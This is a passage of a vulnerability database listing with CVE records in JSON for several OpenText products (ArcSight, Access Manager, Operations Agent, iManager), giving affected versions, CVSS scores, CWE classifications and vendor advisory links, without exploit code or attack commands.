            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "product": "ArcSight Management Center",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThan": "3.2.5 P1",
                  "status": "affected",
                  "version": "0",
                  "versionType": "custom"
                }
              ]
            },
            {
              "defaultStatus": "unaffected",
              "product": "ArcSight Platform",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThan": "24.2.2",
                  "status": "affected",
                  "version": "0",
                  "versionType": "custom"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in OpenText ArcSight Management Center and ArcSight Platform. The vulnerability could be remotely exploited."
                }
              ],
              "value": "A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in OpenText ArcSight Management Center and ArcSight Platform. The vulnerability could be remotely exploited."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-591",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-591"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "LOW",
                "attackRequirements": "NONE",
                "attackVector": "NETWORK",
                "baseScore": 7,
                "baseSeverity": "HIGH",
                "privilegesRequired": "NONE",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "NONE",
                "subConfidentialityImpact": "LOW",
                "subIntegrityImpact": "LOW",
                "userInteraction": "ACTIVE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:H/VA:L/SC:L/SI:L/SA:N",
                "version": "4.0",
                "vulnAvailabilityImpact": "LOW",
                "vulnConfidentialityImpact": "LOW",
                "vulnIntegrityImpact": "HIGH",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-79",
                  "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-08T17:58:53.697Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://portal.microfocus.com/s/article/KM000035977"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "OpenText ArcSight Management Center and ArcSight Platform Stored XSS",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2024-9841",
        "datePublished": "2024-11-08T17:58:53.697Z",
        "dateReserved": "2024-10-10T20:53:57.733Z",
        "dateUpdated": "2024-11-08T21:12:48.283Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2026-11877 (GCVE-0-2026-11877)

    Vulnerability from cvelistv5 – Published: 2026-06-24 14:01 – Updated: 2026-06-24 15:02
    VLAI
    Title
    Missing Authorization Vulnerability in OpenText Access Manager
    Summary
    An unauthorized user can modify configuration through API calls that affects the OpenText Access Manager. This issue affects Access Manager before 5.1.3.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-648 - Incorrect use of privileged APIs
    Assigner
    References
    Impacted products
    Vendor Product Version
    OpenText Access Manager Affected: 5.1 , ≤ 5.1.2 (server)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-11877",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-06-24T15:01:47.754068Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-06-24T15:02:15.542Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Access Manager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "5.1.2",
                  "status": "affected",
                  "version": "5.1",
                  "versionType": "server"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cspan\u003eAn unauthorized user can modify configuration through API\ncalls that affects the OpenText Access\nManager\u003c/span\u003e.\u0026nbsp;\u003cspan\u003eThis issue affects Access Manager before 5.1.3.\u003c/span\u003e"
                }
              ],
              "value": "An unauthorized user can modify configuration through API\ncalls that affects the OpenText Access\nManager.\u00a0This issue affects Access Manager before 5.1.3."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-1",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-1 Accessing Functionality Not Properly Constrained by ACLs"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "HIGH",
                "attackRequirements": "PRESENT",
                "attackVector": "NETWORK",
                "baseScore": 6.3,
                "baseSeverity": "MEDIUM",
                "exploitMaturity": "NOT_DEFINED",
                "privilegesRequired": "NONE",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "NONE",
                "subConfidentialityImpact": "LOW",
                "subIntegrityImpact": "LOW",
                "userInteraction": "NONE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N",
                "version": "4.0",
                "vulnAvailabilityImpact": "NONE",
                "vulnConfidentialityImpact": "NONE",
                "vulnIntegrityImpact": "LOW",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-648",
                  "description": "CWE-648 Incorrect use of privileged APIs",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-06-24T14:01:38.193Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://portal.microfocus.com/s/article/KM000047450"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Missing Authorization Vulnerability in OpenText Access Manager",
          "x_generator": {
            "engine": "Vulnogram 1.0.2"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2026-11877",
        "datePublished": "2026-06-24T14:01:38.193Z",
        "dateReserved": "2026-06-10T13:19:47.916Z",
        "dateUpdated": "2026-06-24T15:02:15.542Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-11878 (GCVE-0-2026-11878)

    Vulnerability from cvelistv5 – Published: 2026-06-24 14:01 – Updated: 2026-06-24 15:07
    VLAI
    Title
    Reflected Cross-Site Scripting vulnerability in OpenText Access Manager
    Summary
    Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in OpenText Access Manager allows Cross-Site Scripting (XSS). This issue affects Access Manager: from 5.1 through 5.1.2.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-79 - Improper neutralization of input during web page generation ('cross-site scripting')
    Assigner
    References
    Impacted products
    Vendor Product Version
    OpenText Access Manager Affected: 5.1 , ≤ 5.1.2 (server)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-11878",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-06-24T15:04:47.680943Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-06-24T15:07:17.251Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Access Manager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "5.1.2",
                  "status": "affected",
                  "version": "5.1",
                  "versionType": "server"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "Improper neutralization of input during web page generation (\u0027cross-site scripting\u0027) vulnerability in OpenText Access Manager allows Cross-Site Scripting (XSS).\u003cp\u003eThis issue affects Access Manager: from 5.1 through 5.1.2.\u003c/p\u003e"
                }
              ],
              "value": "Improper neutralization of input during web page generation (\u0027cross-site scripting\u0027) vulnerability in OpenText Access Manager allows Cross-Site Scripting (XSS).\n\nThis issue affects Access Manager: from 5.1 through 5.1.2."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-63",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-63 Cross-Site Scripting (XSS)"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "HIGH",
                "attackRequirements": "PRESENT",
                "attackVector": "NETWORK",
                "baseScore": 8.2,
                "baseSeverity": "HIGH",
                "exploitMaturity": "NOT_DEFINED",
                "privilegesRequired": "NONE",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "NONE",
                "subConfidentialityImpact": "LOW",
                "subIntegrityImpact": "NONE",
                "userInteraction": "NONE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N",
                "version": "4.0",
                "vulnAvailabilityImpact": "NONE",
                "vulnConfidentialityImpact": "HIGH",
                "vulnIntegrityImpact": "NONE",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-79",
                  "description": "CWE-79 Improper neutralization of input during web page generation (\u0027cross-site scripting\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-06-24T14:01:26.437Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://portal.microfocus.com/s/article/KM000047449"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Reflected Cross-Site Scripting vulnerability in OpenText Access Manager",
          "x_generator": {
            "engine": "Vulnogram 1.0.2"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2026-11878",
        "datePublished": "2026-06-24T14:01:26.437Z",
        "dateReserved": "2026-06-10T13:20:08.609Z",
        "dateUpdated": "2026-06-24T15:07:17.251Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-2123 (GCVE-0-2026-2123)

    Vulnerability from cvelistv5 – Published: 2026-03-31 17:18 – Updated: 2026-03-31 18:00 X_Oa_Privilege_Escalation
    VLAI
    Title
    Privilege escalation vulnerability in Operations Agent
    Summary
    A security audit identified a privilege escalation vulnerability in Operations Agent(<=OA 12.29) on Windows. Under specific conditions Operations Agent may run executables from specific writeable locations.Thanks to Manuel Rickli & Philippe Leiser of Oneconsult AG for reporting this vulnerability
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-280 - Improper handling of insufficient permissions or privileges
    Assigner
    References
    Impacted products
    Vendor Product Version
    OpenText Operations Agent Affected: OA 12.22 , ≤ OA 12.29 (custom)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-2123",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-03-31T17:58:14.103027Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-03-31T18:00:56.901Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "collectionURL": "https://gitlab.otxlab.net/itom/opr/oa/OvEaAgt",
              "defaultStatus": "unaffected",
              "modules": [
                "libopc_r"
              ],
              "packageName": "OvEaAgt",
              "platforms": [
                "Windows"
              ],
              "product": "Operations Agent",
              "programFiles": [
                "ntproc.c"
              ],
              "repo": "https://gitlab.otxlab.net/itom/opr/oa/OvEaAgt",
              "vendor": "OpenText",
              "versions": [
                {
                  "changes": [
                    {
                      "at": "OA 12.30",
                      "status": "unaffected"
                    }
                  ],
                  "lessThanOrEqual": "OA 12.29",
                  "status": "affected",
                  "version": "OA 12.22",
                  "versionType": "custom"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cdiv\u003e\u003cp\u003eA security audit identified a privilege escalation\nvulnerability in Operations Agent(\u0026lt;=OA 12.29) on Windows. Under specific conditions\nOperations Agent may run executables from specific writeable locations.\u003cspan\u003eThanks to Manuel Rickli \u0026amp; Philippe Leiser of\nOneconsult AG for reporting this vulnerability\u003c/span\u003e\u003c/p\u003e\u003c/div\u003e"
                }
              ],
              "value": "A security audit identified a privilege escalation\nvulnerability in Operations Agent(\u003c=OA 12.29) on Windows. Under specific conditions\nOperations Agent may run executables from specific writeable locations.Thanks to Manuel Rickli \u0026 Philippe Leiser of\nOneconsult AG for reporting this vulnerability"
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-122",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-122 Privilege Abuse"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "LOW",
                "attackRequirements": "NONE",
                "attackVector": "LOCAL",
                "baseScore": 8.6,
                "baseSeverity": "HIGH",
                "exploitMaturity": "NOT_DEFINED",
                "privilegesRequired": "LOW",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "HIGH",
                "subConfidentialityImpact": "HIGH",
                "subIntegrityImpact": "HIGH",
                "userInteraction": "PASSIVE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
                "version": "4.0",
                "vulnAvailabilityImpact": "HIGH",
                "vulnConfidentialityImpact": "HIGH",
                "vulnIntegrityImpact": "HIGH",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-280",
                  "description": "CWE-280 Improper handling of insufficient permissions or privileges",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-03-31T17:18:43.202Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "tags": [
                "customer-entitlement"
              ],
              "url": "https://portal.microfocus.com/s/article/KM000046068"
            }
          ],
          "solutions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eThe hotfix can be downloaded from the\u0026nbsp;\u003ca href=\"https://marketplace.opentext.com/itom/content/operations-agent-hotfix-for-cve-2026-2123-privilege-escalation/\" title=\"https://marketplace.opentext.com/itom/content/operations-agent-hotfix-for-cve-2026-2123-privilege-escalation/\"\u003eMarketplace\u003c/a\u003e\u0026nbsp;for the OA versions mentioned below.\u0026nbsp;\u003c/p\u003e\u003cp\u003ePlease follow the readme.txt\nincluded in the hotfix zip file for\u0026nbsp;install instructions.\u0026nbsp;\u003c/p\u003e\u003cp\u003eOA 12.24 - HFWIN_1224028.tar,\nHFWIN_1224029.tar\u003c/p\u003e\u003cp\u003eOA 12.25 -\nHFWIN_1225045.tar,HFWIN_1225046.tar\u0026nbsp;\u003c/p\u003e\u003cp\u003eOA 12.26 - HFWIN_1226039.tar,\nHFWIN_1226040.tar\u003c/p\u003e\u003cp\u003eOA 12.27 - HFWIN_1227023.tar,\nHFWIN_1227024.tar\u003c/p\u003e\u003cp\u003eOA 12.28 - HFWIN_1228020.tar,\nHFWIN_1228021.tar\u003c/p\u003e\u003cp\u003eOA 12.29 - HFWIN_1229006.tar,\nHFWIN_1229007.tar\u003c/p\u003e\u003cp\u003e\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\u003c/p\u003e\u003cp\u003e\u0026nbsp;\u003c/p\u003e"
                }
              ],
              "value": "The hotfix can be downloaded from the\u00a0 Marketplace https://marketplace.opentext.com/itom/content/operations-agent-hotfix-for-cve-2026-2123-privilege-escalation/ \u00a0for the OA versions mentioned below.\u00a0\n\nPlease follow the readme.txt\nincluded in the hotfix zip file for\u00a0install instructions.\u00a0\n\nOA 12.24 - HFWIN_1224028.tar,\nHFWIN_1224029.tar\n\nOA 12.25 -\nHFWIN_1225045.tar,HFWIN_1225046.tar\u00a0\n\nOA 12.26 - HFWIN_1226039.tar,\nHFWIN_1226040.tar\n\nOA 12.27 - HFWIN_1227023.tar,\nHFWIN_1227024.tar\n\nOA 12.28 - HFWIN_1228020.tar,\nHFWIN_1228021.tar\n\nOA 12.29 - HFWIN_1229006.tar,\nHFWIN_1229007.tar"
            }
          ],
          "source": {
            "advisory": "2761008",
            "defect": [
              "2761008"
            ],
            "discovery": "EXTERNAL"
          },
          "tags": [
            "x_oa_privilege_escalation"
          ],
          "title": "Privilege escalation vulnerability in Operations Agent",
          "x_generator": {
            "engine": "Vulnogram 1.0.1"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2026-2123",
        "datePublished": "2026-03-31T17:18:43.202Z",
        "dateReserved": "2026-02-06T14:55:51.920Z",
        "dateUpdated": "2026-03-31T18:00:56.901Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2021-38116 (GCVE-0-2021-38116)

    Vulnerability from cvelistv5 – Published: 2024-11-22 15:34 – Updated: 2024-11-25 18:09
    VLAI
    Title
    Possible Command injection Vulnerability in OpenText iManager
    Summary
    Possible Elevation of Privilege Vulnerability in iManager has been discovered in OpenText™ iManager. This impacts all versions before 3.2.5
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.4.0000 (rpm, exe)
    Create a notification for this product.
    opentext imanager Affected: 3.0.0 , ≤ 3.2.1.0000 (rpm)
        cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "affected": [
              {
                "cpes": [
                  "cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*"
                ],
                "defaultStatus": "unknown",
                "product": "imanager",
                "vendor": "opentext",
                "versions": [
                  {
                    "lessThanOrEqual": "3.2.1.0000",
                    "status": "affected",
                    "version": "3.0.0",
                    "versionType": "rpm"
                  }
                ]
              }
            ],
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2021-38116",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-25T18:07:52.008299Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-25T18:09:04.657Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.4.0000",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible Elevation of Privilege Vulnerability\n\nin iManager \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager. This impacts all versions before 3.2.5\u003c/strong\u003e\u003cstrong\u003e\u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible Elevation of Privilege Vulnerability\n\nin iManager has been discovered in\nOpenText\u2122 iManager. This impacts all versions before 3.2.5"
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-248",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-248 Command Injection"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-77",
                  "description": "CWE-77 Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:43.211Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/imanager325_releasenotes/data/imanager325_releasenotes.html"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible Command injection Vulnerability in OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2021-38116",
        "datePublished": "2024-11-22T15:34:43.211Z",
        "dateReserved": "2021-08-04T20:57:01.487Z",
        "dateUpdated": "2024-11-25T18:09:04.657Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-38117 (GCVE-0-2021-38117)

    Vulnerability from cvelistv5 – Published: 2024-11-22 15:34 – Updated: 2024-11-25 18:10
    VLAI
    Title
    Possible Remote Code Execution Vulnerability OpenText iManager
    Summary
    Possible Command injection Vulnerability in iManager has been discovered in OpenText™ iManager 3.2.4.0000.
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-94 - Improper Control of Generation of Code ('Code Injection')
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.4.0000 (rpm, exe)
    Create a notification for this product.
    opentext imanager Affected: 3.0.0 , ≤ 3.2.4.0000 (rpm)
        cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "affected": [
              {
                "cpes": [
                  "cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*"
                ],
                "defaultStatus": "unknown",
                "product": "imanager",
                "vendor": "opentext",
                "versions": [
                  {
                    "lessThanOrEqual": "3.2.4.0000",
                    "status": "affected",
                    "version": "3.0.0",
                    "versionType": "rpm"
                  }
                ]
              }
            ],
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2021-38117",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-25T18:09:19.610981Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-25T18:10:33.565Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.4.0000",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible Command injection Vulnerability\n\nin iManager \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.4.0000\u003c/strong\u003e\u003cstrong\u003e.\u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible Command injection Vulnerability\n\nin iManager has been discovered in\nOpenText\u2122 iManager 3.2.4.0000."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-242",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-242 Code Injection"
                }
              ]
            },
            {
              "capecId": "CAPEC-35",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-35 Leverage Executable Code in Non-Executable Files"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-94",
                  "description": "CWE-94 Improper Control of Generation of Code (\u0027Code Injection\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:41.566Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/imanager325_releasenotes/data/imanager325_releasenotes.html"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible Remote Code Execution Vulnerability OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2021-38117",
        "datePublished": "2024-11-22T15:34:41.566Z",
        "dateReserved": "2021-08-04T20:57:01.487Z",
        "dateUpdated": "2024-11-25T18:10:33.565Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-38118 (GCVE-0-2021-38118)

